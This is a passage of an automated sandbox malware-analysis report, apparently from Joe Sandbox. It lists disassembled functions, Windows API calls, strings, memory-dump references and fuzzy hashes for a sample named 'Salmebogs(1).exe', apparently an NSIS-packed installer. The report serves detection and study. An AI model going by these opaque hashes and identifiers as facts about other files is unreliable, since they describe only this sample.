                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                        • String ID: %ls=%ls$NUL$[Rename]
                                                                        • API String ID: 222337774-899692902
                                                                        • Opcode ID: 1e4b3f9ed39bbde156711f5f56b5ab96e9de2d35df18f06069f2e470ca92d8c4
                                                                        • Instruction ID: 4bbe9f86b8adcb3ee4fdb7780e986b6535a4f1249b773ec96b367cc427070a1a
                                                                        • Opcode Fuzzy Hash: 1e4b3f9ed39bbde156711f5f56b5ab96e9de2d35df18f06069f2e470ca92d8c4
                                                                        • Instruction Fuzzy Hash: 8A312770600F147BD2202B718D49F6B3E6CEF41759F14003ABA81F62D2DA7CEA018EAD
                                                                        Function 004062C1 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Salmebogs(1).exe",00403258,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A5), ref: 00406324
                                                                        • CharNextW.USER32(?,?,?,00000000), ref: 00406333
                                                                        • CharNextW.USER32(?,00000000,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Salmebogs(1).exe",00403258,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A5), ref: 00406338
                                                                        • CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Salmebogs(1).exe",00403258,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A5), ref: 0040634B
                                                                        Strings
                                                                        • "C:\Users\user\Desktop\Salmebogs(1).exe", xrefs: 004062C1
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004062C2
                                                                        • *?|<>/":, xrefs: 00406313
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: Char$Next$Prev
                                                                        • String ID: "C:\Users\user\Desktop\Salmebogs(1).exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 589700163-3294326113
                                                                        • Opcode ID: 7b766ee50bb8b1a0f4eab2cbe77ea87c6d078045d263edb3b82a780548374b37
                                                                        • Instruction ID: c327e11968ff1b61697d85eec455557f32973e7d313eb7c6419ca2acb5234ebd
                                                                        • Opcode Fuzzy Hash: 7b766ee50bb8b1a0f4eab2cbe77ea87c6d078045d263edb3b82a780548374b37
                                                                        • Instruction Fuzzy Hash: 9111C85580021295DB3037549D40AB7A7B8EF55754F52803FED86732C0E77C9C9286ED
                                                                        Function 00404158 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 00404175
                                                                        • GetSysColor.USER32(00000000), ref: 00404191
                                                                        • SetTextColor.GDI32(?,00000000), ref: 0040419D
                                                                        • SetBkMode.GDI32(?,?), ref: 004041A9
                                                                        • GetSysColor.USER32(?), ref: 004041BC
                                                                        • SetBkColor.GDI32(?,?), ref: 004041CC
                                                                        • DeleteObject.GDI32(?), ref: 004041E6
                                                                        • CreateBrushIndirect.GDI32(?), ref: 004041F0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                        • String ID:
                                                                        • API String ID: 2320649405-0
                                                                        • Opcode ID: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                                        • Instruction ID: ea06b333114cee9cc67994af2ac871624958d76533ae86cbe2848aaafb465e30
                                                                        • Opcode Fuzzy Hash: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                                        • Instruction Fuzzy Hash: 7E2196B1500704AFCB219F68EE0CB4B7BF8AF41710F04893DE995E66A0D734D944CB64
                                                                        Function 004025E5 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                          • Part of subcall function 00405CE3: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,00000000,?,?,004025CA,00000000,00000000,?,00000000,00000011), ref: 00405CF9
                                                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                        • String ID: 9
                                                                        • API String ID: 163830602-2366072709
                                                                        • Opcode ID: 45a21482c542318f13e1eb5333aa3b1a888cf07139c1879041507e3b187ffe5f
                                                                        • Instruction ID: dafe1f73e2ee8cdb860d3706a1f39e5ecceba59a5ef1a457f192d56af1ee0b6a
                                                                        • Opcode Fuzzy Hash: 45a21482c542318f13e1eb5333aa3b1a888cf07139c1879041507e3b187ffe5f
                                                                        • Instruction Fuzzy Hash: 44510974D00219ABDF209F94CA88ABEB779FF04344F50447BE501F72D0D7B999829B69
                                                                        Function 00404A56 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A71
                                                                        • GetMessagePos.USER32 ref: 00404A79
                                                                        • ScreenToClient.USER32(?,?), ref: 00404A93
                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AA5
                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404ACB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: Message$Send$ClientScreen
                                                                        • String ID: f
                                                                        • API String ID: 41195575-1993550816
                                                                        • Opcode ID: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                                        • Instruction ID: 9eff9150a992eb2fb06457ff5e0cc0326f2b5a04812ccf7126d2c147f81e0dfa
                                                                        • Opcode Fuzzy Hash: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                                        • Instruction Fuzzy Hash: FC015E71A4021CBADB00DBA4DD85FFEBBBCAF58715F10012BBB51B61C0D7B49A418BA4
                                                                        Function 00402D04 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                        • MulDiv.KERNEL32(00086C3A,00000064,00086E3E), ref: 00402D4D
                                                                        • wsprintfW.USER32 ref: 00402D5D
                                                                        • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                        Strings
                                                                        • verifying installer: %d%%, xrefs: 00402D57
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                        • String ID: verifying installer: %d%%
                                                                        • API String ID: 1451636040-82062127
                                                                        • Opcode ID: 6ea019a5c915e27d0383299d327640edd576fd3642c792e58a0fbb2247e90e0f
                                                                        • Instruction ID: 33f6bc0f9c66ffbc6f0a9480d788631f8e7fe4f3fd8502bd98e35746da28410b
                                                                        • Opcode Fuzzy Hash: 6ea019a5c915e27d0383299d327640edd576fd3642c792e58a0fbb2247e90e0f
                                                                        • Instruction Fuzzy Hash: 7701447064020DAFEF149F61DD49BAA3B69FB04304F00803AFA05A91D0DBB99955CB58
                                                                        Function 0040565B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040569E
                                                                        • GetLastError.KERNEL32 ref: 004056B2
                                                                        • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056C7
                                                                        • GetLastError.KERNEL32 ref: 004056D1
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405681
                                                                        • C:\Users\user\Desktop, xrefs: 0040565B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                        • API String ID: 3449924974-1229045261
                                                                        • Opcode ID: 00ef7c6a0f32c1044080c086edeac3c819c61aa9b54d8d974478d91d60ac005e
                                                                        • Instruction ID: dadfd0f85cedcb10ba49dc730fb6619fbbf26863a665bac08794baa5a138d59b
                                                                        • Opcode Fuzzy Hash: 00ef7c6a0f32c1044080c086edeac3c819c61aa9b54d8d974478d91d60ac005e
                                                                        • Instruction Fuzzy Hash: F9010871D00219DBDF109FA0C9447EFBBB8EB14304F10443AE548F6280D77996148FA9
                                                                        Function 00402840 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                        • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                        • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                        • CloseHandle.KERNEL32(?), ref: 00402914
                                                                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                        • String ID:
                                                                        • API String ID: 2667972263-0
                                                                        • Opcode ID: 153c2b5082c2598bc60d8fb24d19b11048e31c8bd3494510fa3f863c5ef051a4
                                                                        • Instruction ID: ba6f49517a5b121574735636d58c2dc186d973e03c124db2f1d5768ba00f8754
                                                                        • Opcode Fuzzy Hash: 153c2b5082c2598bc60d8fb24d19b11048e31c8bd3494510fa3f863c5ef051a4
                                                                        • Instruction Fuzzy Hash: AC21CE72801128BBDF216FA5CE49D9E7E79EF09324F20023AF510762E1CB794E418F98
                                                                        Function 00405AE9 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 47stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0040602D: lstrcpynW.KERNEL32(?,?,00000400,0040332A,007A7A20,NSIS Error), ref: 0040603A
                                                                          • Part of subcall function 00405A8C: CharNextW.USER32(?,?,007A4728,?,00405B00,007A4728,007A4728, 4#v,?,C:\Users\user\AppData\Local\Temp\,0040583E,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A9A
                                                                          • Part of subcall function 00405A8C: CharNextW.USER32(00000000), ref: 00405A9F
                                                                          • Part of subcall function 00405A8C: CharNextW.USER32(00000000), ref: 00405AB7
                                                                        • lstrlenW.KERNEL32(007A4728,00000000,007A4728,007A4728, 4#v,?,C:\Users\user\AppData\Local\Temp\,0040583E,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B42
                                                                        • GetFileAttributesW.KERNEL32(007A4728,007A4728,007A4728,007A4728,007A4728,007A4728,00000000,007A4728,007A4728, 4#v,?,C:\Users\user\AppData\Local\Temp\,0040583E,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 00405B52
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                        • String ID: 4#v$(Gz$C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 3248276644-844125704
                                                                        • Opcode ID: 727da4a5fd54559f0b5fa84b8a7a338ed841983ac59879e6f1508895b9972b86
                                                                        • Instruction ID: 8ae2fce49526f5710a07790df8cd11e23799bcf3340ba248b926081ff081d995
                                                                        • Opcode Fuzzy Hash: 727da4a5fd54559f0b5fa84b8a7a338ed841983ac59879e6f1508895b9972b86
                                                                        • Instruction Fuzzy Hash: 98F0F429104D5116C622763A1C4AEAF3564CF8236471A023FF852B22D2DF3CB953CCBE
                                                                        Function 00402BFF Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
